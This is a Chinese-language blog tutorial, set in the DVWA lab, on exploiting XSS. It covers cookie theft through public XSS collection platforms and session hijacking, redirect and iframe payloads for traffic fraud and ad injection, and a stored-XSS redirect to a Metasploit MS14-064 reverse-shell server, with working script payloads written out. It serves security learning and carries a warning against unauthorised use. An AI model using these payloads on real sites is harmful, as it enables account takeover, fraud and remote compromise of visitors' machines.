XSS漏洞利用方式汇总

以下所有的针对XSS的利用方式都是对XSS的深一步的学习了解、请勿于未授权环境下进行非法操作!!!

在这里插入图片描述

一、窃取Cookie

1.1 目的

  恶意攻击者通过XSS攻击,窃取其他账户的Cookie信息从而进行未授权非法操作。

1.2 实操

搭建xss平台

这里我直接百度一个xss平台来接Cookie

Tips:为了安全起见,建议使用自己搭建的XSS平台(如测试学习,不敏感的话随意)

》》注册一个测试账号(fengyue@126.com:fengyue123)
xss平台:

  • https://xss.pt
  • https://xsshs.cn
    在这里插入图片描述
    》》任意创建一个项目
    在这里插入图片描述
    在这里插入图片描述
    》》复制payload
    在这里插入图片描述
获取Cookie

》》这里我们使用靶场DVWA进行测试,在存在xss地方输入payload:

在这里插入图片描述
》》点击提交后即可在解cookie平台获取到当前账户的cookie和真实IP:
在这里插入图片描述
》》使用管理员的cookie登录系统(使用Chrome上的F12开发者工具,将拿到的Cookie值放入到Application中,浏览器输入跳转的目的地址回车便成功登录他人账户)
在这里插入图片描述

二、广告传播/SEO优化/刷取流量

2.1 目的

  通过恶意的JS代码将正常页面跳转到目的页面,利用网站进行重定向实现其引流、广告位传播等目的。

2.2 实操

2.2.1 恶意刷取访问量
网页直接跳转

(3种方式)

<script type="text/javascript">window.location.href="跳转的目的地址";</script>
<script type="text/javascript">window. location.replace("跳转的目的地址");</script>
<script type="text/javascript">window. location.assign("跳转的目的地址");</script>

》》为了体现效果,对靶机DVWA 存储型XSS处插入JS代码实现网页跳转:
(用户一访问到此页面就自动访问访问我博客的某一篇文章,访问量就+1)
在这里插入图片描述

网页延迟跳转

(网页停留三秒后再进行跳转)

<script type="text/javascript">
  function jumurl(){
  window.location.href = 'https://www.baidu.com';
  }
  setTimeout(jumurl,3000);
</script>
2.2.2 恶意广告展示

这里可以通过导入外链的方式对受害站点插入广告位,以来传播广告

<script>document.writeln("<iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='2000' height='5000' allowTransparency src=https://blog.csdn.net/Aaron_Miller/article/details/105918848></iframe>");</script>

在这里插入图片描述

三、网页挂马/权限提升

3.1 目的

  通过木马服务器(kali)搭建生成一个恶意URL地址,并通过存储型XSS挂到页面中。只要存在未打相应补丁的用户访问了挂马页面,恶意攻击者便获取到了受害者的控制权限(重点在于目的系统是否打了相应补丁)

3.2 环境

  • 木马服务器(Kali  MS14-064  IP:192.168.7.129)
  • 受害者(Windows Server 2003 R2  IP:192.168.7.136)
  • 存在XSS的服务器(Win10 DVWA靶机 IP:192.168.1.103)

3.3 实操

3.3.1 生成木马URL

》》启动Metasploit
在这里插入图片描述
》》调用缓冲区溢出漏洞MS14-064(影响范围Win95-Win10,触发该漏洞条件要客户端装有power shell,详情见:微软官网
在这里插入图片描述
》》设置木马服务器IP,允许调用powsershell
在这里插入图片描述
》》调用反弹连接payload

Tips:reverse_tcp好处:靶机主动连接我们,不用担心靶机防火墙的问题

在这里插入图片描述
》》设置监听IP,使用默认监听端口4444,执行攻击(自动生成攻击地址)
在这里插入图片描述

3.3.2 XSS插入地址

》》恶意攻击者通过存储型xss将木马服务器生成的地址插入到网站中:

<script type="text/javascript">window.location.href="http://192.168.7.129:8080/W0fGq97a2ICU0
";</script>

在这里插入图片描述
》》当存在ms14-064漏洞的主机访问到该页面,攻击者就会获取到目的服务器操作系统的权限(如开启摄像头、添加用户、截屏、录音等)
(win2003r2模拟访问)
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

風月长情

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值